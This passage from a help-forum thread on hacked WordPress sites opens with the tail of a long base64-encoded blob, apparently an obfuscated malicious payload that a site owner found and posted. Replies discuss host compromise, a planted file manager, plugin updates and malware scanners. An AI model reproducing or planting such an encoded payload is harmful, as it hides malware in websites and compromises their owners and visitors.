AOxkuuFWB9RCA4XnXETbiwByJOXimaHUv2FS+oBpYzCl8DqEx5MQWmY8GSf6LTKfcX9kvcFcrctHyBPfgzpjGOYW7pMmUNfnlPZTNi+VakTBEH6AdP9M9aWZmw7zjIdp0XiegQlo3sCMryEcu4NHFk8FTDilc51gXjDqEvrYctpnriHN6h6mr0Zl8Jqg5B5VC7YiXs8FOPI6Q18vlQ+/n5i0mPT4+EFzmi7A9GZrnif8HecYV4ryE12aYWAxrYvBhoqRkJDTSqSYQNWsTm6grPa1Z2Nw+161fCQVHz9vG5ydz7sGxsloGLc5d8+NUumTWZnwWeYvTE7Xa2VBukENcDx4Scrw+YBLtc0Abur/3Le+nksdSLgR55D8XvHHaaLXNO2TWR5OpFdrlpFOuxj12juWqY/v1LJtT9cUSLCCB2BSbuGiJYrd1yQqS++917OHQAhD31eq0GHqxGmKR2OA5FFpiTigWlWIKATfc/iVawatQvsOqIHewRB/XJYDpLKkZ7++jNnP1KwmxozAxXSECjxEb+EH4GuP5FuSAOekgCNKg/JRP5GwfTMHihJIkGrguaX51wJfYNqLcZH+DoASqKb94x5pDkkXDqydYFZ5Jm+In/XUNiYDVlK1kVCwhSQ5rvdTlszzDndceb+lSVHIOreewl9daWneetk7oDOvOq4sr187G1ArWE2xEm4MygqV3lflRsQ8CN8kOCQgAR/JEb/5Ve+ot1uNExtMlp7N15p02cS4CdAF6T9FA/BjzPu2QH/DS+ADfaFia7yJdQBIys5007PpCFshgImVa6r7zagKIhZrbfDFrVov3TeznWogwShIu/UEkOhRIb8tA7rpPUQxIjDFOCpd+jkhSxSypURKyRRHGKw5W75doCtmJmDuKq3LJcNY4oIbsv3fOMar6WRQEdL9QGMj3rzeSVWm85SRGigTvwDAU8FFaNH3eLeUZAWKEiHV24DBTPIGaTqWodkP4FkI4MHl0lIx2TXpJKjdWwPArRFw4L1l8zbIvWCwUDGyzziiCrCjNElcs/YBJdOX4vYLpiCkqgpZOKROXwVoRvnE5/X5+8qjD+1M9vClW6PMGgWeU4KlJX6OMSDdkzACKeoCsgrpDKDB5aEqzoCD7ptOQUfoJ0hphmFIDU4Z7jKIL+/SVwaI8cwHDwjpOecFEpcAZqEh5qW+7JqrzrK6Es3x5Rr2VShyXDCHDcLM91xPNWCY/X4JhAzWILo743NaKaONIg/U7LE8c+MQP6DnHp0HNwQWtjSptU3323mEgOAraMxzELeBziEg84HRWuIn8ZmfLsRrSO85bek4Bt8wMBxfY8gVfEPgyupW+5FeHEBKIDGAoHrFKVF4895lSMg7B3C1mN2DgiTkU5FFTePjG/QNFylL/fpUiM21GB5WEA95IFL4DS8MKGYnDuz5hTEGoKpucAosZP/yf/SnP2e8mMRAqIV8WweMY6/1gcjtktTXtdF+/+gKJxrfTvpw37eCg/DXDg7gLy+YoLDG9Ldyi/N9whAsUUp0xD0gk8+SsfzzT8gURxZtRL2NBLPrH2bDvUCbBYJRDHUPhFdgBKCpY6LvpVgB8KlRey+AWoLm4IB6TiAg/GoCtqiBwOpCpPP1aR3BAEDdbPL6BYwjwUtu8+i/mKoC/tW/PAkZFlSsbjdsYtBc8YCYQ1uf1REXEezNWZUAHBhdWPbgUAO58LQBViGgJOlbfxfV21Nboabi/hXrShafQVzXogOcxUU21LkzQAszVgAtilxbfzhIAk2PeyJQLO+pEqcCrMvFCWI3aft9swu3H1jpyqatTcFSXHC1SKQPqFi2SPvTbjM2jgZoXI3yarKDUGLrI1r6wI7qagQmntSW4ORGOZ94rRlVXB0WBVJ0O1H+9hNRVQr80e/mLoNbk3tfWgqgXs7kLXOCCkfx7oEJT5ubNZWlQ1yyn/VJIHmkWEoIj9c3BPodS+4+8TAvxCQsI/Xs8T6+cYst7kla5khIVbeC3MegUtb0ZpaUcKy0UCQbWqcVxTz03KzaMNbnZiJdtO77oYClvl7S7FaaaxaXsorOJL1a8DRkkr6D/AE+K5icLY4IGP6PS4KMuqHz9nrN4rd4JL81DWZjCnajoWmikYtBZRBG+0zoG59KaC3e0SmY9F6gllfeHvlJHfdNkHfyYsyUQAzwJ7q3FABDsiy+ziFc3+k4ISCvqyJ46ZkYe8UJUGkwoM0a0WP+Ca7JvSfctsxA/+cTHgTHx5PNDD9zHsCU3yIOIkDM51dQeJAYNDh83x318gsJHIo0P1Ewyb3JBYv3u1g8SToQpJ2+2bIuHz/yJ/fDCtLxA2d8jmOi/2znBKseMHJmHYZdpMYPuTl4JcMePl8uSARi+LLs+PwlJAm5m/Z4V7/yoU2aJ8aiZ/wIjPBjYswb8NP0ph8a3qGloajBdHBsrX8srzrZaiPDuY5kgun7U5YUWLNFxks/50Mvpr5eP+V2kWBTdkIlE7AjAOUrfyqBGpO+u+jkk7wgKJAJ/HKtoD+M7ZHZFyJXYDy2PK+EhwWCuu8BxlVZzTP7zKW2vDhA0Ku/fCJRSnQljn3AYwkkZHfiNKCKQqolYTxbTFBXQM6vBwhbztO0OWnHhz4+zmtPA/A/LuC6Mal5dnbDm/mkFtDoX7W3/dyKm5mnGrDVNqgdFMJATx9ui6XMFX7xjdV2Yu9VT9IBJBYg2Arv+VP88nmiTSm1yFj9HsB5LETkUcGugjS03j2GKWpjyQOW5a9XzGchYgQ5BvDADmet8crlwjDOGKR6A/mhZwOos1IMqH2WN7kMBpmfYhE1AEIO4tppFLU5n4nGquwPjmbslH75rFKXLaey7goEZ/BvpaF6YxG+B991XpGDGd5QTsIBCkSR/eJ/JC2a/q29GPwzbcwrirIXZY+6AMoVG1QSlcjpBSbinj31Tt9BggGS9Y+I3aGG9nzgtNH2GMegHmFOye8RTKUsXu/fkHi5Ga0RVxM9/DSKiJxfN1i2wOea0VBpEh5bI58eaF4MBW3iAmicB+Q1bfR89WhDpSeFL97bzOM7qB5qf4+67ByzUb9p+Y0Xm8ZBsI4tXFA0zO8m9oaM1FvC2fqvKH1vjMOzqdcguOU05u7kmljWqr6OMxw//o5JeqYqnYWoqQZ64/OwYnIcxxm9SRPZv92Y6aRS++8ZdO9cHdMJ4HVFXACQDNbz6L71gFqupSoNA5CNbvYXiDdxJFTEgfEgVZB4nykZSFX6KUaA34xiv76bvdrSRtTobGrr24irctxXoy1C43NZdyZg6PEpC/KyZnoiPyObnDll8nDMEfO0r3SKlbil6+sHpqosviqwL8UbyfObH4IFHW1pw022aXmvxw+aJD/ZAjFJAYEa/ydv8SuK7aDL0OrPGM3A/Bi5qEp5i3rf4I6jzTmqOPtuCkliqiWENNuyVhRB6fX+BUCsf39Fpkq89yfowXaM4/C/rXO8OGtPGKLNjOoLST8EHvS13gUfwLRuO4H+ltEcAZcPkzEmLDHs8m2nNohnW8YPBgstRpj71uD9/mLoAMhvEp8j7NYNmjnTH66UXxR3OrM9XepNwtPbzAAz+7qws89ALNQ4MLrLnQbARdcRyKbKg8kBBC+mffZnJfUsMY6jmQPrGszUD17l3bbauCtF7gAqicyj98adWnw9g/qtsV2pJqCqJe/wt3OACcrOhCjZjUfohGQXlMzMevIphI/rMgeJ0Xfrlcw+g6CRU+OMwtef1v6o0ds+TbCG46OA0y1BvfET66cUkFbBYU3+yumXo7xrGsXEtL2YZl2JjQYJXsBkSySw7SwOkyKNNnlorbXTNjFD2aRFoTBJ8nQQVHL8dQJIp5lsq1MmfdYtzI2OYjblcfEU7/XWCZR9xdWDmNR2PhkYnbMfBUsBPZiHSgFPc39ho5jvDIVurHhWb/QAOYkv0OP9UlRfd+Aoz74nb6AES4jTMR5hjbjC/NAOCzwQyQO1IdJZpXn93PinRC1ZzxVhljnQnNzA5myy9ZZvBdKTfZD2dRaFIBXYAUZEs8gr6ircyW803TMQxgf358abEnCplASIlrf+JecdQS/gd2Ck+tr5s7gAaXQQ1nnNBrChl2pMYVk59W+jAKgZVxbK2VxV7SGfLsZTqHMyGKx+BoMeEt0FLH9h+g55PYUV8JZMPmD0oqrN6zKDwCN4Asmi5JU7OGzbncs/SxGe7++KCv3cZt9DXj8kYt8UQDt/BpdsBovO54QQl0R9wb6HSzvxDgELJdBcctj2DMGlbFN3VYmvFVrV+zsh35CGorxZYy2gIwcx6mBK+2QBgHAfvsHaALayms8IIo9X/hLBNqIYs48YyyOFgqClcofoSyOUKp6lNi9FpYPR7MOJOL4mcryCbrbI5hKdsfnXOV3wIsgf9gsDVBygAgPP1AD42D+2f1ELlbJKb0CDxQCj09LPLQ/uySo/dImQY6OaFgiFMnn+Kr79bK+kehGTgyWwMKVp2Ngx31p7P51gcHXCSQ99atZ+8KnM+Wnca4MHe5eNGTJmKE7X5w/IuSDPY1Jap0iKXTZvqKsHlpRJfz9nj2Y8DiyPOKsUZEgUqMoDiGIXCgZcFciShyWHXwX7lmnzdZivsyHiSztwwphAK25BJy75+6sDg9gG0uTGckiLl1A3qEF3SAcIV+97VSUbwII6iHWOWacBDhSTXvw10l1ypzGLKmYOdHb92pWrL0NKyLPw4u/b6aNXwojkVh8eeP7nAyzKAoczCEAJ6KOzUZXv4kXrAwnNiSU2kyeeNGLZ5nqruiSYFpq7QgS2yTgmr+o+ZqvbnzNNIjcifIG8XwWGfcPgPBBjl2lkeDbblen2qkRA7V8BhSsniLnrAFvBFoBs18XtJS42+EmB9F9KX5K3Ihwev42aeAGacKjBjGgbM7OmOR8gcfmifCDSkhqAvoj8jUNgw5A4fcIdNIIg3zhJNoCd3QEDK3G+83aBvrYmcVqwM7RXEaADMWeHylPF5wN8g01HUYZKIEgEDubbLb4mGR5h3FHRL+uwdJ0wRKDrDzYCf7sc9bHAJrNwifejOHxvtT9Abc8N2I5ThuBoyT/WkEpximGE/asbY45G2/tuQMtXSk1hQQTGAOLEK8ML8edDhOvlXaloFIi2GCSdfhGhR87lg1cK4cd2w00Cx6B5lTiweAmp6Bx+0lRIfbyWKyTUV3AvcqVZiPAtlI0+AGIGAR6Pqmg9Zc1RQCYnWXgQvbLzZQqPpoD7vVZylUDTqiNyytY/RUYGonG1/dIhK9jcNXbGSWpffX6h873xKtNPXZdsybzUDV3U8q+YPdkJ6oHblMkI4mkoSLf1AVJcs0RFMo57F77DS4gCVuD0lks5uBvAx8PjMxF6x9yT7VEgIBEO7mHtY0Lv97DS+PQ7Yg6oz6eUty5EfNwTfUb+fSDLPW+5QlRABmupywNSf1RQIofWDwJJGAWB5x5E/7RiLHaBoG0rGBHmFit0201MHTcAaCcOmrWV5/kgB1DL2VdK7GMwfuBsDrLdcnN7VrFvC56srLKUeybFN9C9NY2rowRkSeQBMO5v59NZ+fip9RajWN6x+CGA2DUEVqIl1k2YcC55yMBSRfv0UHceTClRTP7J+nTHfM/XJnjUPknb+wJwbcQ1JQDoK/x7xbTYgBEOrBmogW4uih36XtdpqoDKpbjPgj81T1Qx2sE9TlTLAPwc/qSd8Psq0YTUwTIVulprFAs3XGdIPti/l2+U0Cv73ONJYHKSLjd2QxMXHpNIYpzJ0MjruyuxE4bJCgNyoaFMsHduyJ0fWyYSfZcPHkSjyYsdpuSpnmLSXk8/d0udvSxrFul9G2O2BizpAby95tMV2C+jBkLhnbGfQHxmjqBI1v37owgdnATlVc/Kffelwdh5iKw/7VLAuI/soyxTn9epjQn2PTGwnsK3rdayHi7aY361p1ofxQIUB6zAxnRvAezyhuwHx3wM9FpXf1QN//2izBjm3g8srng2YWIA/RenvyF/JSEPJO8up67XBoKlRXV7Glx+QNRL18OhHVbHEuD35Qrk7YiEhNMA/BQBUgZwwRF1LvFsAfDAP34fqjauKyRvNDFqjJoFWy8Y5Eh9A5/tIxrBfqAxDzHit3rPZJIzY0hDADLLRk8wkGmp589wm8vqLAQo39Jd7YNV5WjXFOYGYcAwXkECklR6MPmBIMp71I7oEwLZT2d84HV93G6LdRv7drBzEhQG9nPps9F+ACVXae9YiwD7ucM5xV500Uh7oZmV82umt1AIa8vbE45TPI7haO2l2bpEoY9F2llRLJzJBgL297G6GrD1UgFBQwWj8jk3wqvto4+e5xnC9J6Czsw7ALvuAPLZrjpGW9wJKrAvGhjNeWB8QV4Toymvb2EdKUjMUIBuyDCvfnk5AdrV3opTQCZFEHDfGhxLhVIOvacOOcPONGHdNKQ9ZVWDatf/MzrhIPpt3iafVFFqJs090QzFDjOrlJHLH0tsMBNzATjnsUA++1f0Gox15zEQD3LtaXMEa4wpl/yiaaAk7CzbH07wBajcJkKMjYWgxYErx0ZpewNseFmoF/m6cEhECbpwvH0F6wr5mxnn+aJmYj/oXoiIJhfG/NeqdgKAibz5jt7nVGqV0Tkhg0EM6ccQyYq2sIpLlMOOLQO4EG581Fujvu7mu6eLgqB7OtGj4Xy1Xy72kyX+HHsedqSl70VhE+tGr+/vZ2fvwhHAsgA3Qa00YohQU3b8Yrob1A2s+PQ8PKITDPiaIwXZU0khv2/IA6nzHKgC9ErWJInoFdHE3xbk3L97ELd2xnOBDQYov7csfwFLLvVhQb778l6EQDubRT5V5nt+kVG2apXDWC7YNmH9EZfcAAgmc7QrPLq3+dxH9S3mzIH8TQFtTC1+ZLTv7C/9MmjnIDYvAoGtqgMoYD58PxvI4Y4B2xyY2hsxNBLGy99RQFxEcnL3q/Xjwx841XPi1WuQjMCvE9WAiRvDd1YKYJMEBsUI2HVzRt0cWoP/leoZApQaDXyXV1WQD1h9CbKD5mKlcsuBBC5MoW7RKRvo+jAs4RIVnMHiUlpKGvNw9VJHAoupOoIKji3H8We3vTDs5KzYxpd3MvUzDpqlvcG7NpVg9x3ldjVY2PIdgvcLSL51QuQAdx0TbenD+4Nv5zcq8k6GQEmVsRGwlftSelPeSGB7zPyAGG7Zu/rnMWIlmwaPEQbzg31Dd4w7aBwb95i43ekIYtCX31T/mHdhIFmBfAgz6GHbTVewlBKdCulqXViRSJDNB77OisXPhIHp2AahYSdKIRTK4gPKogks0hSAbF7sttD9KtipLLBm5yjEOuyWYAtnQMtBydd7sHfofwGPBx5xYAwUt9nSYN9RZL1OmXdZnNOXtkzB7rqL8x76fIGEC2C/louKoBHolKLP6Ns3n+OiosaYHB+cvtD5kwbgxkh0tmtOizBttAzWnxJ6M3BgzqyhQDRTB7FJzeLuawyydT8aqA9P/WcdMMaABaI1PBgORl1RTbM5HOM9OJfgroQt3M+hAuwYXetkgGkjhukOfoyTBqz0A1fXPtM67MAIwH1+lMWyuFPTBg42oj0wDFYsMApYaIo9YKbYd3hZFKAxg5VJb/C1ZWXdGKyoYsBhgcHXXvm0g8IkoCI4GNbN0hlOB8mhaHwMh6QZgqE+hATDUC0AlbwBi3DgjqoOFGdrxHEeB74e8HtZY4Zi8FpoYZc9GAabAMAiTBgu4AbGBsSAmaGzFRgXwc7VHgYvvIagDYbYN8wcfgyM1mcZqw4sRYEHRIIh5gfVKNi8yoL8IbyZTz+SXQSV4OfWL/AtAgzP4KeICgzoEqYHnwNcsRriC1hr94BrBX4fW9whhBMes0BmBUgg2AM5H+TBYZIC1yUHS10d+KFTBkZrqHs2D1BTMHrJC7woMOPCmJXW8NEpYD0sIOiVLDzgFejk8FLAywFcnkFWgfvROGROXg8OfPFaUwgFhmLcuZwYhVY2hilAqFbHUZ48DHZu1vCP+dd/++c//+1//c//Dw=="));```
````

Comment: All these attacks typically expose an end-point to run arbitrary code. It won't tell you how it got in.

Comment: KNowing what it does will not stop it getting in. Make sure you have upgraded WP and all the plugins etc. If yor plugins have not been maintained recently, consider replacing them with ones that have.

Comment: I'm seeing this too, on all my WP sites with my host. And not all of them are running the same plugins either. I would love to know what is causing it so that I can stop re-infection. 
I'll be following this thread with interest.

Comment: All my hacked sites are on TSOHost. None of my other sites with the same plugins were hacked on a different server. TSOHost denied it was an issue with their cloud hosting server, but now theyre migrating the sites to a new server... so, go figure!

Comment: @Narkanister I have a few of these same files on the TSO hosted wordpress site. Did you confirm they are malicious? Can they just be deleted?

Comment: OK it was definitely hacked, there was some file called mgb.php which looked like some sort of file manager. My other totally separate Wordpress site on TSO also looked hacked, pretty sure they have a major problem

Answer (score 1):

My website had a same issued it's similar to this, checked and trace it was come from the plugins / themes if it's nulled or free plugins but not updated.

try to update all the plugins and themes, to find other script you can used WordFence plugins to scan your sites.

Comment: Thanks - yes, It's frustrating - this was with Wordfence plugin, all other plugins are qusality and everything is updated. 5 different sites on diffrerent shared hosting clusters were hacked in the same way. However the Wordfence WAF is disabled bacause it interferes with the CDN ... should just get better hosting I guess...  I personally think hosting is the issues - loads of other issues too though of course they deny it! No problem with sites on diffrerent host.

Answer (score 0):

I had similar issue and tried various linux based tool,jetpack security. None of them could identify the problems. My guess was that it is a child theme I had which has been hacked but was not sure.
Since I was on AWS, I used AWS GuardRail and that helped me identify the issue in 2 hours. I have used free version but worth paying for.
It was customizr theme which was hacked, if you are curious

[image: Hacked file wordpress]